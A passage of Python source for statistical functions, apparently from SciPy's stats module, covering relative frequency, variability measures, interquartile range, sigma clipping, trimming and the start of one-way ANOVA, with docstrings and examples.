>>> ax2.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
cumhist = np.cumsum(h * 1, axis=0)
return CumfreqResult(cumhist, l, b, e)
RelfreqResult = namedtuple('RelfreqResult',
('frequency', 'lowerlimit', 'binsize',
'extrapoints'))
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""
Return a relative frequency histogram, using the histogram function.
A relative frequency histogram is a mapping of the number of
observations in each of the bins relative to the total of observations.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
frequency : ndarray
Binned values of relative frequency.
lowerlimit : float
Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy import stats
>>> a = np.array([2, 4, 1, 2, 3, 2])
>>> res = stats.relfreq(a, numbins=4)
>>> res.frequency
array([ 0.16666667, 0.5 , 0.16666667, 0.16666667])
>>> np.sum(res.frequency) # relative frequencies should add up to 1
1.0
Create a normal distribution with 1000 random values
>>> rng = np.random.RandomState(seed=12345)
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate relative frequencies
>>> res = stats.relfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.frequency.size,
... res.frequency.size)
Plot relative frequency histogram
>>> fig = plt.figure(figsize=(5, 4))
>>> ax = fig.add_subplot(1, 1, 1)
>>> ax.bar(x, res.frequency, width=res.binsize)
>>> ax.set_title('Relative frequency histogram')
>>> ax.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
a = np.asanyarray(a)
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
h = h / a.shape[0]
return RelfreqResult(h, l, b, e)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
"""
Compute the O'Brien transform on input data (any number of arrays).
Used to test for homogeneity of variance prior to running one-way stats.
Each array in ``*args`` is one level of a factor.
If `f_oneway` is run on the transformed data and found significant,
the variances are unequal. From Maxwell and Delaney [1]_, p.112.
Parameters
----------
args : tuple of array_like
Any number of arrays.
Returns
-------
obrientransform : ndarray
Transformed data for use in an ANOVA. The first dimension
of the result corresponds to the sequence of transformed
arrays. If the arrays given are all 1-D of the same length,
the return value is a 2-D array; otherwise it is a 1-D array
of type object, with each element being an ndarray.
References
----------
.. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.
Examples
--------
We'll test the following data sets for differences in their variance.
>>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
>>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
Apply the O'Brien transform to the data.
>>> from scipy.stats import obrientransform
>>> tx, ty = obrientransform(x, y)
Use `scipy.stats.f_oneway` to apply a one-way ANOVA test to the
transformed data.
>>> from scipy.stats import f_oneway
>>> F, p = f_oneway(tx, ty)
>>> p
0.1314139477040335
If we require that ``p < 0.05`` for significance, we cannot conclude
that the variances are different.
"""
TINY = np.sqrt(np.finfo(float).eps)
# `arrays` will hold the transformed arguments.
arrays = []
for arg in args:
a = np.asarray(arg)
n = len(a)
mu = np.mean(a)
sq = (a - mu)**2
sumsq = sq.sum()
# The O'Brien transform.
t = ((n - 1.5) * n * sq - 0.5 * sumsq) / ((n - 1) * (n - 2))
# Check that the mean of the transformed data is equal to the
# original variance.
var = sumsq / (n - 1)
if abs(var - np.mean(t)) > TINY:
raise ValueError('Lack of convergence in obrientransform.')
arrays.append(t)
return np.array(arrays)
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
"""
Compute standard error of the mean.
Calculate the standard error of the mean (or standard error of
measurement) of the values in the input array.
Parameters
----------
a : array_like
An array containing the values for which the standard error is
returned.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Delta degrees-of-freedom. How many degrees of freedom to adjust
for bias in limited samples relative to the population estimate
of variance. Defaults to 1.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
s : ndarray or float
The standard error of the mean in the sample(s), along the input axis.
Notes
-----
The default value for `ddof` is different to the default (0) used by other
ddof containing routines, such as np.std and np.nanstd.
Examples
--------
Find standard error along the first axis:
>>> from scipy import stats
>>> a = np.arange(20).reshape(5,4)
>>> stats.sem(a)
array([ 2.8284, 2.8284, 2.8284, 2.8284])
Find standard error across the whole array, using n degrees of freedom:
>>> stats.sem(a, axis=None, ddof=0)
1.2893796958227628
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.sem(a, axis, ddof)
n = a.shape[axis]
s = np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
return s
def zscore(a, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the z score.
Compute the z score of each value in the sample, relative to the
sample mean and standard deviation.
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
zscore : array_like
The z-scores, standardized by mean and standard deviation of
input array `a`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> a = np.array([ 0.7972, 0.0767, 0.4383, 0.7866, 0.8091,
... 0.1954, 0.6307, 0.6599, 0.1065, 0.0508])
>>> from scipy import stats
>>> stats.zscore(a)
array([ 1.1273, -1.247 , -0.0552, 1.0923, 1.1664, -0.8559, 0.5786,
0.6748, -1.1488, -1.3324])
Computing along a specified axis, using n-1 degrees of freedom
(``ddof=1``) to calculate the standard deviation:
>>> b = np.array([[ 0.3148, 0.0478, 0.6243, 0.4608],
... [ 0.7149, 0.0775, 0.6072, 0.9656],
... [ 0.6341, 0.1403, 0.9759, 0.4064],
... [ 0.5918, 0.6948, 0.904 , 0.3721],
... [ 0.0921, 0.2481, 0.1188, 0.1366]])
>>> stats.zscore(b, axis=1, ddof=1)
array([[-0.19264823, -1.28415119, 1.07259584, 0.40420358],
[ 0.33048416, -1.37380874, 0.04251374, 1.00081084],
[ 0.26796377, -1.12598418, 1.23283094, -0.37481053],
[-0.22095197, 0.24468594, 1.19042819, -1.21416216],
[-0.82780366, 1.4457416 , -0.43867764, -0.1792603 ]])
"""
a = np.asanyarray(a)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
mns = np.nanmean(a=a, axis=axis, keepdims=True)
sstd = np.nanstd(a=a, axis=axis, ddof=ddof, keepdims=True)
else:
mns = a.mean(axis=axis, keepdims=True)
sstd = a.std(axis=axis, ddof=ddof, keepdims=True)
return (a - mns) / sstd
def zmap(scores, compare, axis=0, ddof=0):
"""
Calculate the relative z-scores.
Return an array of z-scores, i.e., scores that are standardized to
zero mean and unit variance, where mean and variance are calculated
from the comparison array.
Parameters
----------
scores : array_like
The input for which z-scores are calculated.
compare : array_like
The input from which the mean and standard deviation of the
normalization are taken; assumed to have the same dimension as
`scores`.
axis : int or None, optional
Axis over which mean and variance of `compare` are calculated.
Default is 0. If None, compute over the whole array `scores`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
Returns
-------
zscore : array_like
Z-scores, in the same shape as `scores`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> from scipy.stats import zmap
>>> a = [0.5, 2.0, 2.5, 3]
>>> b = [0, 1, 2, 3, 4]
>>> zmap(a, b)
array([-1.06066017, 0. , 0.35355339, 0.70710678])
"""
scores, compare = map(np.asanyarray, [scores, compare])
mns = compare.mean(axis=axis, keepdims=True)
sstd = compare.std(axis=axis, ddof=ddof, keepdims=True)
return (scores - mns) / sstd
def gstd(a, axis=0, ddof=1):
"""
Calculate the geometric standard deviation of an array.
The geometric standard deviation describes the spread of a set of numbers
where the geometric mean is preferred. It is a multiplicative factor, and
so a dimensionless quantity.
It is defined as the exponent of the standard deviation of ``log(a)``.
Mathematically the population geometric standard deviation can be
evaluated as::
gstd = exp(std(log(a)))
.. versionadded:: 1.3.0
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int, tuple or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degree of freedom correction in the calculation of the
geometric standard deviation. Default is 1.
Returns
-------
ndarray or float
An array of the geometric standard deviation. If `axis` is None or `a`
is a 1d array a float is returned.
Notes
-----
As the calculation requires the use of logarithms the geometric standard
deviation only supports strictly positive values. Any non-positive or
infinite values will raise a `ValueError`.
The geometric standard deviation is sometimes confused with the exponent of
the standard deviation, ``exp(std(a))``. Instead the geometric standard
deviation is ``exp(std(log(a)))``.
The default value for `ddof` is different to the default value (0) used
by other ddof containing functions, such as ``np.std`` and ``np.nanstd``.
Examples
--------
Find the geometric standard deviation of a log-normally distributed sample.
Note that the standard deviation of the distribution is one, on a
log scale this evaluates to approximately ``exp(1)``.
>>> from scipy.stats import gstd
>>> np.random.seed(123)
>>> sample = np.random.lognormal(mean=0, sigma=1, size=1000)
>>> gstd(sample)
2.7217860664589946
Compute the geometric standard deviation of a multidimensional array and
of a given axis.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> gstd(a, axis=None)
2.2944076136018947
>>> gstd(a, axis=2)
array([[1.82424757, 1.22436866, 1.13183117],
[1.09348306, 1.07244798, 1.05914985]])
>>> gstd(a, axis=(1,2))
array([2.12939215, 1.22120169])
The geometric standard deviation further handles masked arrays.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> ma = np.ma.masked_where(a > 16, a)
>>> ma
masked_array(
data=[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[--, --, --, --],
[--, --, --, --]]],
mask=[[[False, False, False, False],
[False, False, False, False],
[False, False, False, False]],
[[False, False, False, False],
[ True, True, True, True],
[ True, True, True, True]]],
fill_value=999999)
>>> gstd(ma, axis=2)
masked_array(
data=[[1.8242475707663655, 1.2243686572447428, 1.1318311657788478],
[1.0934830582350938, --, --]],
mask=[[False, False, False],
[False, True, True]],
fill_value=999999)
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
try:
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
return np.exp(np.std(log(a), axis=axis, ddof=ddof))
except RuntimeWarning as w:
if np.isinf(a).any():
raise ValueError(
'Infinite value encountered. The geometric standard deviation '
'is defined for strictly positive values only.')
a_nan = np.isnan(a)
a_nan_any = a_nan.any()
# exclude NaN's from negativity check, but
# avoid expensive masking for arrays with no NaN
if ((a_nan_any and np.less_equal(np.nanmin(a), 0)) or
(not a_nan_any and np.less_equal(a, 0).any())):
raise ValueError(
'Non positive value encountered. The geometric standard '
'deviation is defined for strictly positive values only.')
elif 'Degrees of freedom <= 0 for slice' == str(w):
raise ValueError(w)
else:
# Remaining warnings don't need to be exceptions.
return np.exp(np.std(log(a, where=~a_nan), axis=axis, ddof=ddof))
except TypeError:
raise ValueError(
'Invalid array input. The inputs could not be '
'safely coerced to any supported types')
# Private dictionary initialized only once at module level
# See https://en.wikipedia.org/wiki/Robust_measures_of_scale
_scale_conversions = {'raw': 1.0,
'normal': special.erfinv(0.5) * 2.0 * math.sqrt(2.0)}
def iqr(x, axis=None, rng=(25, 75), scale='raw', nan_policy='propagate',
interpolation='linear', keepdims=False):
r"""
Compute the interquartile range of the data along the specified axis.
The interquartile range (IQR) is the difference between the 75th and
25th percentile of the data. It is a measure of the dispersion
similar to standard deviation or variance, but is much more robust
against outliers [2]_.
The ``rng`` parameter allows this function to compute other
percentile ranges than the actual IQR. For example, setting
``rng=(0, 100)`` is equivalent to `numpy.ptp`.
The IQR of an empty array is `np.nan`.
.. versionadded:: 0.18.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or sequence of int, optional
Axis along which the range is computed. The default is to
compute the IQR for the entire array.
rng : Two-element sequence containing floats in range of [0,100] optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The default is the true IQR:
`(25, 75)`. The order of the elements is not important.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The following string values are recognized:
'raw' : No scaling, just return the raw IQR.
'normal' : Scale by :math:`2 \sqrt{2} erf^{-1}(\frac{1}{2}) \approx 1.349`.
The default is 'raw'. Array-like scale is also allowed, as long
as it broadcasts correctly to the output such that
``out / scale`` is a valid operation. The output dimensions
depend on the input array, `x`, the `axis` argument, and the
`keepdims` flag.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, optional
Specifies the interpolation method to use when the percentile
boundaries lie between two data points `i` and `j`.
The following options are available (default is 'linear'):
* 'linear': `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* 'lower': `i`.
* 'higher': `j`.
* 'nearest': `i` or `j` whichever is nearest.
* 'midpoint': `(i + j) / 2`.
keepdims : bool, optional
If this is set to `True`, the reduced axes are left in the
result as dimensions with size one. With this option, the result
will broadcast correctly against the original array `x`.
Returns
-------
iqr : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var
Notes
-----
This function is heavily dependent on the version of `numpy` that is
installed. Versions greater than 1.11.0b3 are highly recommended, as they
include a number of enhancements and fixes to `numpy.percentile` and
`numpy.nanpercentile` that affect the operation of this function. The
following modifications apply:
Below 1.10.0 : `nan_policy` is poorly defined.
The default behavior of `numpy.percentile` is used for 'propagate'. This
is a hybrid of 'omit' and 'propagate' that mostly yields a skewed
version of 'omit' since NaNs are sorted to the end of the data. A
warning is raised if there are NaNs in the data.
Below 1.9.0: `numpy.nanpercentile` does not exist.
This means that `numpy.percentile` is used regardless of `nan_policy`
and a warning is issued. See previous item for a description of the
behavior.
Below 1.9.0: `keepdims` and `interpolation` are not supported.
The keywords get ignored with a warning if supplied with non-default
values. However, multiple axes are still supported.
References
----------
.. [1] "Interquartile range" https://en.wikipedia.org/wiki/Interquartile_range
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
.. [3] "Quantile" https://en.wikipedia.org/wiki/Quantile
Examples
--------
>>> from scipy.stats import iqr
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> iqr(x)
4.0
>>> iqr(x, axis=0)
array([ 3.5, 2.5, 1.5])
>>> iqr(x, axis=1)
array([ 3., 1.])
>>> iqr(x, axis=1, keepdims=True)
array([[ 3.],
[ 1.]])
"""
x = asarray(x)
# This check prevents percentile from raising an error later. Also, it is
# consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, string_types):
scale_key = scale.lower()
if scale_key not in _scale_conversions:
raise ValueError("{0} not a valid scale for `iqr`".format(scale))
scale = _scale_conversions[scale_key]
# Select the percentile function to use based on nans and policy
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'omit':
percentile_func = _iqr_nanpercentile
else:
percentile_func = _iqr_percentile
if len(rng) != 2:
raise TypeError("quantile range must be two element sequence")
if np.isnan(rng).any():
raise ValueError("range must not contain NaNs")
rng = sorted(rng)
pct = percentile_func(x, rng, axis=axis, interpolation=interpolation,
keepdims=keepdims, contains_nan=contains_nan)
out = np.subtract(pct[1], pct[0])
if scale != 1.0:
out /= scale
return out
def median_absolute_deviation(x, axis=0, center=np.median, scale=1.4826,
nan_policy='propagate'):
"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.3.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
A function that will return the central value. The default is to use
np.median. Any user defined function used will need to have the function
signature ``func(arr, axis)``.
scale : int, optional
The scaling factor applied to the MAD. The default scale (1.4826)
ensures consistency with the standard deviation for normally distributed
data.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
References
----------
.. [1] "Median absolute deviation" https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_absolute_deviation` with ``np.std``,
the latter is affected when we change a single value of an array to have an
outlier value while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_absolute_deviation(x)
1.2280762773108278
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_absolute_deviation(x)
1.2340335571164334
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_absolute_deviation(x)
array([5.1891, 3.7065, 2.2239])
>>> stats.median_absolute_deviation(x, axis=None)
2.9652
"""
x = asarray(x)
# Consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'propagate':
return np.nan
if contains_nan and nan_policy == 'omit':
# Way faster than carrying the masks around
arr = ma.masked_invalid(x).compressed()
else:
arr = x
if axis is None:
med = center(arr)
mad = np.median(np.abs(arr - med))
else:
med = np.apply_over_axes(center, arr, axis)
mad = np.median(np.abs(arr - med), axis=axis)
return scale * mad
def _iqr_percentile(x, q, axis=None, interpolation='linear', keepdims=False, contains_nan=False):
"""
Private wrapper that works around older versions of `numpy`.
While this function is pretty much necessary for the moment, it
should be removed as soon as the minimum supported numpy version
allows.
"""
if contains_nan and NumpyVersion(np.__version__) < '1.10.0a':
# I see no way to avoid the version check to ensure that the corrected
# NaN behavior has been implemented except to call `percentile` on a
# small array.
msg = "Keyword nan_policy='propagate' not correctly supported for " \
"numpy versions < 1.10.x. The default behavior of " \
"`numpy.percentile` will be used."
warnings.warn(msg, RuntimeWarning)
try:
# For older versions of numpy, there are two things that can cause a
# problem here: missing keywords and non-scalar axis. The former can be
# partially handled with a warning, the latter can be handled fully by
# hacking in an implementation similar to numpy's function for
# providing multi-axis functionality
# (`numpy.lib.function_base._ureduce` for the curious).
result = np.percentile(x, q, axis=axis, keepdims=keepdims,
interpolation=interpolation)
except TypeError:
if interpolation != 'linear' or keepdims:
# At time or writing, this means np.__version__ < 1.9.0
warnings.warn("Keywords interpolation and keepdims not supported "
"for your version of numpy", RuntimeWarning)
try:
# Special processing if axis is an iterable
original_size = len(axis)
except TypeError:
# Axis is a scalar at this point
pass
else:
axis = np.unique(np.asarray(axis) % x.ndim)
if original_size > axis.size:
# mimic numpy if axes are duplicated
raise ValueError("duplicate value in axis")
if axis.size == x.ndim:
# axis includes all axes: revert to None
axis = None
elif axis.size == 1:
# no rolling necessary
axis = axis[0]
else:
# roll multiple axes to the end and flatten that part out
for ax in axis[::-1]:
x = np.rollaxis(x, ax, x.ndim)
x = x.reshape(x.shape[:-axis.size] +
(np.prod(x.shape[-axis.size:]),))
axis = -1
result = np.percentile(x, q, axis=axis)
return result
def _iqr_nanpercentile(x, q, axis=None, interpolation='linear', keepdims=False,
contains_nan=False):
"""
Private wrapper that works around the following:
1. A bug in `np.nanpercentile` that was around until numpy version
1.11.0.
2. A bug in `np.percentile` NaN handling that was fixed in numpy
version 1.10.0.
3. The non-existence of `np.nanpercentile` before numpy version
1.9.0.
While this function is pretty much necessary for the moment, it
should be removed as soon as the minimum supported numpy version
allows.
"""
if hasattr(np, 'nanpercentile'):
# At time or writing, this means np.__version__ < 1.9.0
result = np.nanpercentile(x, q, axis=axis,
interpolation=interpolation,
keepdims=keepdims)
# If non-scalar result and nanpercentile does not do proper axis roll.
# I see no way of avoiding the version test since dimensions may just
# happen to match in the data.
if result.ndim > 1 and NumpyVersion(np.__version__) < '1.11.0a':
axis = np.asarray(axis)
if axis.size == 1:
# If only one axis specified, reduction happens along that dimension
if axis.ndim == 0:
axis = axis[None]
result = np.rollaxis(result, axis[0])
else:
# If multiple axes, reduced dimeision is last
result = np.rollaxis(result, -1)
else:
msg = "Keyword nan_policy='omit' not correctly supported for numpy " \
"versions < 1.9.x. The default behavior of numpy.percentile " \
"will be used."
warnings.warn(msg, RuntimeWarning)
result = _iqr_percentile(x, q, axis=axis)
return result
#####################################
# TRIMMING FUNCTIONS #
#####################################
SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower', 'upper'))
def sigmaclip(a, low=4., high=4.):
"""
Perform iterative sigma-clipping of array elements.
Starting from the full sample, all elements outside the critical range are
removed, i.e. all elements of the input array `c` that satisfy either of
the following conditions::
c < mean(c) - std(c)*low
c > mean(c) + std(c)*high
The iteration continues with the updated sample until no
elements are outside the (updated) range.
Parameters
----------
a : array_like
Data array, will be raveled if not 1-D.
low : float, optional
Lower bound factor of sigma clipping. Default is 4.
high : float, optional
Upper bound factor of sigma clipping. Default is 4.
Returns
-------
clipped : ndarray
Input array with clipped elements removed.
lower : float
Lower threshold value use for clipping.
upper : float
Upper threshold value use for clipping.
Examples
--------
>>> from scipy.stats import sigmaclip
>>> a = np.concatenate((np.linspace(9.5, 10.5, 31),
... np.linspace(0, 20, 5)))
>>> fact = 1.5
>>> c, low, upp = sigmaclip(a, fact, fact)
>>> c
array([ 9.96666667, 10. , 10.03333333, 10. ])
>>> c.var(), c.std()
(0.00055555555555555165, 0.023570226039551501)
>>> low, c.mean() - fact*c.std(), c.min()
(9.9646446609406727, 9.9646446609406727, 9.9666666666666668)
>>> upp, c.mean() + fact*c.std(), c.max()
(10.035355339059327, 10.035355339059327, 10.033333333333333)
>>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
... np.linspace(-100, -50, 3)))
>>> c, low, upp = sigmaclip(a, 1.8, 1.8)
>>> (c == np.linspace(9.5, 10.5, 11)).all()
True
"""
c = np.asarray(a).ravel()
delta = 1
while delta:
c_std = c.std()
c_mean = c.mean()
size = c.size
critlower = c_mean - c_std * low
critupper = c_mean + c_std * high
c = c[(c >= critlower) & (c <= critupper)]
delta = size - c.size
return SigmaclipResult(c, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
"""
Slice off a proportion of items from both ends of an array.
Slice off the passed proportion of items from both ends of the passed
array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
rightmost 10% of scores). The trimmed values are the lowest and
highest ones.
Slice off less if proportion results in a non-integer slice index (i.e.
conservatively slices off `proportiontocut`).
Parameters
----------
a : array_like
Data to trim.
proportiontocut : float
Proportion (in range 0-1) of total data set to trim of each end.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
out : ndarray
Trimmed version of array `a`. The order of the trimmed content
is undefined.
See Also
--------
trim_mean
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trimboth(a, 0.1)
>>> b.shape
(16,)
"""
a = np.asarray(a)
if a.size == 0:
return a
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut >= uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return atmp[tuple(sl)]
def trim1(a, proportiontocut, tail='right', axis=0):
"""
Slice off a proportion from ONE end of the passed array distribution.
If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
10% of scores. The lowest or highest values are trimmed (depending on
the tail).
Slice off less if proportion results in a non-integer slice index
(i.e. conservatively slices off `proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of 'left' or 'right' of distribution.
tail : {'left', 'right'}, optional
Defaults to 'right'.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
trim1 : ndarray
Trimmed version of array `a`. The order of the trimmed content is
undefined.
"""
a = np.asarray(a)
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
# avoid possible corner case
if proportiontocut >= 1:
return []
if tail.lower() == 'right':
lowercut = 0
uppercut = nobs - int(proportiontocut * nobs)
elif tail.lower() == 'left':
lowercut = int(proportiontocut * nobs)
uppercut = nobs
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
return atmp[lowercut:uppercut]
def trim_mean(a, proportiontocut, axis=0):
"""
Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.trim_mean(x, 0.1)
9.5
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
a = np.asarray(a)
if a.size == 0:
return np.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return np.mean(atmp[tuple(sl)], axis=axis)
F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
def f_oneway(*args):
"""
Perform one-way ANOVA.
The one-way ANOVA tests the null hypothesis that two or more groups have
the same population mean. The test is applied to samples from two or
more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group.
Returns
-------
statistic : float
The computed F-value of the test.
pvalue : float
The associated p-value from the F-distribution.
Notes
-----
The ANOVA test has important assumptions that must be satisfied in order
for the associated p-value to be valid.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. The population standard deviations of the groups are all equal. This
property is known as homoscedasticity.
If these assumptions are not true for a given set of data, it may still be
possible to use the Kruskal-Wallis H-test (`scipy.stats.kruskal`) although
with some loss of power.
The algorithm is from Heiman[2], pp.394-7.
References
----------
.. [1] R. Lowry, "Concepts and Applications of Inferential Statistics",
Chapter 14, 2014, http://vassarstats.net/textbook/
.. [2] G.W. Heiman, "Understanding research methods and statistics: An
integrated introduction for psychology", Houghton, Mifflin and
Company, 2001.
.. [3] G.H. McDonald, "Handbook of Biological Statistics", One-way ANOVA.
http://www.biostathandbook.com/onewayanova.html
Examples
--------
>>> import scipy.stats as stats
[3]_ Here are some data on a shell measurement (the length of the anterior
adductor muscle scar, standardized by dividing by length) in the mussel
Mytilus trossulus from five locations: Tillamook, Oregon; Newport, Oregon;
Petersburg, Alaska; Magadan, Russia; and Tvarminne, Finland, taken from a
much larger data set used in McDonald et al. (1991).
>>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
... 0.0659, 0.0923, 0.0836]
>>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
... 0.0725]
>>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
